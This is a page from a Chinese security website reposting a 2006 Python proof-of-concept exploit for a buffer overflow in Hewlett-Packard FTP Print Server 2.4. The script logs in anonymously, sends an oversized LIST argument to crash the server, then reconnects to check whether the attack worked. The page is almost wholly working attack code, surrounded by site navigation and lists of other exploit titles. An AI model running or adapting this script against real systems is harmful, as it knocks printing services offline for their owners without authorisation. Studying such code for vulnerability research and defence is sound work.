首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Hewlett-Packard FTP Print Server Version 2.4 Buffer Overflow (POC)
来源:vfocus.net 作者:Joxean 发布时间:2006-12-20  

#!/usr/bin/python

import sys
from ftplib import FTP

print "Hewlett-Packard FTP Print Server Version 2.4 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print

if len(sys.argv) == 1:
print "Usage: %s <target>" % sys.argv[0]
sys.exit(0)

target = sys.argv[1]

print "[+] Running attack against " + target

try:
ftp = FTP(target)
except:
print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
sys.exit(0)
try:
msg = ftp.login() # Login anonymously
print msg
except:
print "[!] Error logging anonymously.",sys.exc_info()[1]
sys.exit(0)

iMax = 6
buf = "./A."

for i in range(iMax):
buf += buf

print "[+] Sending buffer of",len(buf),"byte(s) ... "

try:
print "[+] Please, note that sometimes your connection will not be dropped. "
ftp.retrlines("LIST " + buf)
print "[!] Exploit doesn't work :("
print
sys.exit(0)
except:
print "[+] Apparently exploit works. Verifying ... "
print sys.exc_info()[1]

ftp2 = FTP(target)

try:
msg = ftp2.login()
print "[!] No, it doesn't work :( "
print
print msg
sys.exit(0)
except:
print "[+] Yes, it works."
print sys.exc_info()[1]




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Hewlett-Packard FTP Print Serv
·Exploits WinFtp Server Version
·Oracle <= 9i / 10g File Sys
·RealPlayer 10.5 (ActiveX Contr
·KDE 3.5 (libkhtml) <= 4.2.0
·MS Windows (MessageBox) Memory
·Exploits Intel 2200BG 802.11 w
·PHP Advanced Transfer Manager
·wget <= 1.10.2 (Unchecked B
·Ixprim CMS 1.2 Remote Blind SQ
·MS Office Outlook Recipient Co
·Http explorer Web Server 1.02
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved